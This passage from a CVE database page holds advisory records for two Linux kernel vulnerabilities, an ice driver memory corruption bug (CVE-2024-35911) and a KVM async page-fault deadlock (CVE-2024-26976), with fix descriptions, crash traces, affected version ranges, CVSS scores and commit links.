              "version": "ca03b327224ed6be2d07f42ee6ee1cdd586cfd5b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/intel/ice/ice_lib.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.5"
            },
            {
              "lessThan": "6.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.4.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix memory corruption bug with suspend and rebuild\n\nThe ice driver would previously panic after suspend. This is caused\nfrom the driver *only* calling the ice_vsi_free_q_vectors() function by\nitself, when it is suspending. Since commit b3e7b3a6ee92 (\"ice: prevent\nNULL pointer deref during reload\") the driver has zeroed out\nnum_q_vectors, and only restored it in ice_vsi_cfg_def().\n\nThis further causes the ice_rebuild() function to allocate a zero length\nbuffer, after which num_q_vectors is updated, and then the new value of\nnum_q_vectors is used to index into the zero length buffer, which\ncorrupts memory.\n\nThe fix entails making sure all the code referencing num_q_vectors only\ndoes so after it has been reset via ice_vsi_cfg_def().\n\nI didn\u0027t perform a full bisect, but I was able to test against 6.1.77\nkernel and that ice driver works fine for suspend/resume with no panic,\nso sometime since then, this problem was introduced.\n\nAlso clean up an un-needed init of a local variable in the function\nbeing modified.\n\nPANIC from 6.8.0-rc1:\n\n[1026674.915596] PM: suspend exit\n[1026675.664697] ice 0000:17:00.1: PTP reset successful\n[1026675.664707] ice 0000:17:00.1: 2755 msecs passed between update to cached PHC time\n[1026675.667660] ice 0000:b1:00.0: PTP reset successful\n[1026675.675944] ice 0000:b1:00.0: 2832 msecs passed between update to cached PHC time\n[1026677.137733] ixgbe 0000:31:00.0 ens787: NIC Link is Up 1 Gbps, Flow Control: None\n[1026677.190201] BUG: kernel NULL pointer dereference, address: 0000000000000010\n[1026677.192753] ice 0000:17:00.0: PTP reset successful\n[1026677.192764] ice 0000:17:00.0: 4548 msecs passed between update to cached PHC time\n[1026677.197928] #PF: supervisor read access in kernel mode\n[1026677.197933] #PF: error_code(0x0000) - not-present page\n[1026677.197937] PGD 1557a7067 P4D 0\n[1026677.212133] ice 0000:b1:00.1: PTP reset successful\n[1026677.212143] ice 0000:b1:00.1: 4344 msecs passed between update to cached PHC time\n[1026677.212575]\n[1026677.243142] Oops: 0000 [#1] PREEMPT SMP NOPTI\n[1026677.247918] CPU: 23 PID: 42790 Comm: kworker/23:0 Kdump: loaded Tainted: G        W          6.8.0-rc1+ #1\n[1026677.257989] Hardware name: Intel Corporation M50CYP2SBSTD/M50CYP2SBSTD, BIOS SE5C620.86B.01.01.0005.2202160810 02/16/2022\n[1026677.269367] Workqueue: ice ice_service_task [ice]\n[1026677.274592] RIP: 0010:ice_vsi_rebuild_set_coalesce+0x130/0x1e0 [ice]\n[1026677.281421] Code: 0f 84 3a ff ff ff 41 0f b7 74 ec 02 66 89 b0 22 02 00 00 81 e6 ff 1f 00 00 e8 ec fd ff ff e9 35 ff ff ff 48 8b 43 30 49 63 ed \u003c41\u003e 0f b7 34 24 41 83 c5 01 48 8b 3c e8 66 89 b7 aa 02 00 00 81 e6\n[1026677.300877] RSP: 0018:ff3be62a6399bcc0 EFLAGS: 00010202\n[1026677.306556] RAX: ff28691e28980828 RBX: ff28691e41099828 RCX: 0000000000188000\n[1026677.314148] RDX: 0000000000000000 RSI: 0000000000000010 RDI: ff28691e41099828\n[1026677.321730] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000\n[1026677.329311] R10: 0000000000000007 R11: ffffffffffffffc0 R12: 0000000000000010\n[1026677.336896] R13: 0000000000000000 R14: 0000000000000000 R15: ff28691e0eaa81a0\n[1026677.344472] FS:  0000000000000000(0000) GS:ff28693cbffc0000(0000) knlGS:0000000000000000\n[1026677.353000] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[1026677.359195] CR2: 0000000000000010 CR3: 0000000128df4001 CR4: 0000000000771ef0\n[1026677.366779] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[1026677.374369] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[1026677.381952] PKRU: 55555554\n[1026677.385116] Call Trace:\n[1026677.388023]  \u003cTASK\u003e\n[1026677.390589]  ? __die+0x20/0x70\n[1026677.394105]  ? page_fault_oops+0x82/0x160\n[1026677.398576]  ? do_user_addr_fault+0x65/0x6a0\n[1026677.403307]  ? exc_page_fault+0x6a/0x150\n[1026677.407694]  ? asm_exc_page_fault+0x22/0x30\n[1026677.412349]  ? ice_vsi_rebuild_set_coalesce+0x130/0x1e0 [ice]\n[1026677.4186\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:04.871Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e40a02f06ceb0e0b0183e0b973ac5dbf8f75edec"
        },
        {
          "url": "https://git.kernel.org/stable/c/11ff8392943e08a35cb0aa19d638b02db745f170"
        },
        {
          "url": "https://git.kernel.org/stable/c/1cb7fdb1dfde1aab66780b4ba44dba6402172111"
        }
      ],
      "title": "ice: fix memory corruption bug with suspend and rebuild",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35911",
    "datePublished": "2024-05-19T08:35:04.299Z",
    "dateReserved": "2024-05-17T13:50:33.121Z",
    "dateUpdated": "2025-05-04T12:56:04.871Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26976 (GCVE-0-2024-26976)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:20 – Updated: 2025-05-04 09:01

Title

KVM: Always flush async #PF workqueue when vCPU is being destroyed

Summary

In the Linux kernel, the following vulnerability has been resolved: KVM: Always flush async #PF workqueue when vCPU is being destroyed Always flush the per-vCPU async #PF workqueue when a vCPU is clearing its completion queue, e.g. when a VM and all its vCPUs is being destroyed. KVM must ensure that none of its workqueue callbacks is running when the last reference to the KVM _module_ is put. Gifting a reference to the associated VM prevents the workqueue callback from dereferencing freed vCPU/VM memory, but does not prevent the KVM module from being unloaded before the callback completes. Drop the misguided VM refcount gifting, as calling kvm_put_kvm() from async_pf_execute() if kvm_put_kvm() flushes the async #PF workqueue will result in deadlock. async_pf_execute() can't return until kvm_put_kvm() finishes, and kvm_put_kvm() can't return until async_pf_execute() finishes: WARNING: CPU: 8 PID: 251 at virt/kvm/kvm_main.c:1435 kvm_put_kvm+0x2d/0x320 [kvm] Modules linked in: vhost_net vhost vhost_iotlb tap kvm_intel kvm irqbypass CPU: 8 PID: 251 Comm: kworker/8:1 Tainted: G W 6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 Workqueue: events async_pf_execute [kvm] RIP: 0010:kvm_put_kvm+0x2d/0x320 [kvm] Call Trace: <TASK> async_pf_execute+0x198/0x260 [kvm] process_one_work+0x145/0x2d0 worker_thread+0x27e/0x3a0 kthread+0xba/0xe0 ret_from_fork+0x2d/0x50 ret_from_fork_asm+0x11/0x20 </TASK> ---[ end trace 0000000000000000 ]--- INFO: task kworker/8:1:251 blocked for more than 120 seconds. Tainted: G W 6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kworker/8:1 state:D stack:0 pid:251 ppid:2 flags:0x00004000 Workqueue: events async_pf_execute [kvm] Call Trace: <TASK> __schedule+0x33f/0xa40 schedule+0x53/0xc0 schedule_timeout+0x12a/0x140 __wait_for_common+0x8d/0x1d0 __flush_work.isra.0+0x19f/0x2c0 kvm_clear_async_pf_completion_queue+0x129/0x190 [kvm] kvm_arch_destroy_vm+0x78/0x1b0 [kvm] kvm_put_kvm+0x1c1/0x320 [kvm] async_pf_execute+0x198/0x260 [kvm] process_one_work+0x145/0x2d0 worker_thread+0x27e/0x3a0 kthread+0xba/0xe0 ret_from_fork+0x2d/0x50 ret_from_fork_asm+0x11/0x20 </TASK> If kvm_clear_async_pf_completion_queue() actually flushes the workqueue, then there's no need to gift async_pf_execute() a reference because all invocations of async_pf_execute() will be forced to complete before the vCPU and its VM are destroyed/freed. And that in turn fixes the module unloading bug as __fput() won't do module_put() on the last vCPU reference until the vCPU has been freed, e.g. if closing the vCPU file also puts the last reference to the KVM module. Note that kvm_check_async_pf_completion() may also take the work item off the completion queue and so also needs to flush the work queue, as the work will not be seen by kvm_clear_async_pf_completion_queue(). Waiting on the workqueue could theoretically delay a vCPU due to waiting for the work to complete, but that's a very, very small chance, and likely a very small delay. kvm_arch_async_page_present_queued() unconditionally makes a new request, i.e. will effectively delay entering the guest, so the remaining work is really just: trace_kvm_async_pf_completed(addr, cr2_or_gpa); __kvm_vcpu_wake_up(vcpu); mmput(mm); and mmput() can't drop the last reference to the page tables if the vCPU is still alive, i.e. the vCPU won't get stuck tearing down page tables. Add a helper to do the flushing, specifically to deal with "wakeup all" work items, as they aren't actually work items, i.e. are never placed in a workqueue. Trying to flush a bogus workqueue entry rightly makes __flush_work() complain (kudos to whoever added that sanity check). Note, commit 5f6de5cbebee ("KVM: Prevent module exit until al ---truncated---

Severity ?

7 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-400 - Uncontrolled Resource Consumption

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ab2c2f5d9576112ad…
	https://git.kernel.org/stable/c/82e25cc1c2e93c302…
	https://git.kernel.org/stable/c/f8730d6335e5f43d0…
	https://git.kernel.org/stable/c/83d3c5e309611ef59…
	https://git.kernel.org/stable/c/b54478d20375874ae…
	https://git.kernel.org/stable/c/a75afe480d4349c52…
	https://git.kernel.org/stable/c/4f3a3bce428fb439c…
	https://git.kernel.org/stable/c/caa9af2e27c275e08…
	https://git.kernel.org/stable/c/3d75b8aa5c29058a5…

Impacted products

Vendor

Product

Version

Linux

Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < ab2c2f5d9576112ad22cfd3798071cb74693b1f5 (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < 82e25cc1c2e93c3023da98be282322fc08b61ffb (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < f8730d6335e5f43d09151fca1f0f41922209a264 (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < 83d3c5e309611ef593e2fcb78444fc8ceedf9bac (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < b54478d20375874aeee257744dedfd3e413432ff (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < a75afe480d4349c524d9c659b1a5a544dbc39a98 (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < 4f3a3bce428fb439c66a578adc447afce7b4a750 (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < caa9af2e27c275e089d702cfbaaece3b42bca31b (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < 3d75b8aa5c29058a512db29da7cbee8052724157 (git)

Linux

Affected: 2.6.38
Unaffected: 0 , < 2.6.38 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "ab2c2f5d9576",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "82e25cc1c2e9",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "8730d6335e5",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "83d3c5e30961",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "b54478d20375",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "a75afe480d43",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "4f3a3bce428f",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "caa9af2e27c2",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "3d75b8aa5c29",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "2.6.38"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "2.6.38",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "4.20",
                "status": "unaffected",
                "version": "4.19.312",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.5",
                "status": "unaffected",
                "version": "5.4.274",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.11",
                "status": "unaffected",
                "version": "5.10.215",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.16",
                "status": "unaffected",
                "version": "5.15.154",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.2",
                "status": "unaffected",
                "version": "6.1.84",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.7",
                "status": "unaffected",
                "version": "6.6.24",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.8",
                "status": "unaffected",
                "version": "6.7.12",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.9",
                "status": "unaffected",
                "version": "6.8.3",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.9"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26976",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-05T21:06:50.709457Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-400",
                "description": "CWE-400 Uncontrolled Resource Consumption",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-05T21:08:04.785Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.782Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ab2c2f5d9576112ad22cfd3798071cb74693b1f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/82e25cc1c2e93c3023da98be282322fc08b61ffb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f8730d6335e5f43d09151fca1f0f41922209a264"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/83d3c5e309611ef593e2fcb78444fc8ceedf9bac"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b54478d20375874aeee257744dedfd3e413432ff"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a75afe480d4349c524d9c659b1a5a544dbc39a98"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4f3a3bce428fb439c66a578adc447afce7b4a750"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/caa9af2e27c275e089d702cfbaaece3b42bca31b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3d75b8aa5c29058a512db29da7cbee8052724157"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "virt/kvm/async_pf.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ab2c2f5d9576112ad22cfd3798071cb74693b1f5",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "82e25cc1c2e93c3023da98be282322fc08b61ffb",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "f8730d6335e5f43d09151fca1f0f41922209a264",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "83d3c5e309611ef593e2fcb78444fc8ceedf9bac",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "b54478d20375874aeee257744dedfd3e413432ff",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "a75afe480d4349c524d9c659b1a5a544dbc39a98",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "4f3a3bce428fb439c66a578adc447afce7b4a750",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "caa9af2e27c275e089d702cfbaaece3b42bca31b",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "3d75b8aa5c29058a512db29da7cbee8052724157",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "virt/kvm/async_pf.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.38"
            },
            {
              "lessThan": "2.6.38",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: Always flush async #PF workqueue when vCPU is being destroyed\n\nAlways flush the per-vCPU async #PF workqueue when a vCPU is clearing its\ncompletion queue, e.g. when a VM and all its vCPUs is being destroyed.\nKVM must ensure that none of its workqueue callbacks is running when the\nlast reference to the KVM _module_ is put.  Gifting a reference to the\nassociated VM prevents the workqueue callback from dereferencing freed\nvCPU/VM memory, but does not prevent the KVM module from being unloaded\nbefore the callback completes.\n\nDrop the misguided VM refcount gifting, as calling kvm_put_kvm() from\nasync_pf_execute() if kvm_put_kvm() flushes the async #PF workqueue will\nresult in deadlock.  async_pf_execute() can\u0027t return until kvm_put_kvm()\nfinishes, and kvm_put_kvm() can\u0027t return until async_pf_execute() finishes:\n\n WARNING: CPU: 8 PID: 251 at virt/kvm/kvm_main.c:1435 kvm_put_kvm+0x2d/0x320 [kvm]\n Modules linked in: vhost_net vhost vhost_iotlb tap kvm_intel kvm irqbypass\n CPU: 8 PID: 251 Comm: kworker/8:1 Tainted: G        W          6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n Workqueue: events async_pf_execute [kvm]\n RIP: 0010:kvm_put_kvm+0x2d/0x320 [kvm]\n Call Trace:\n  \u003cTASK\u003e\n  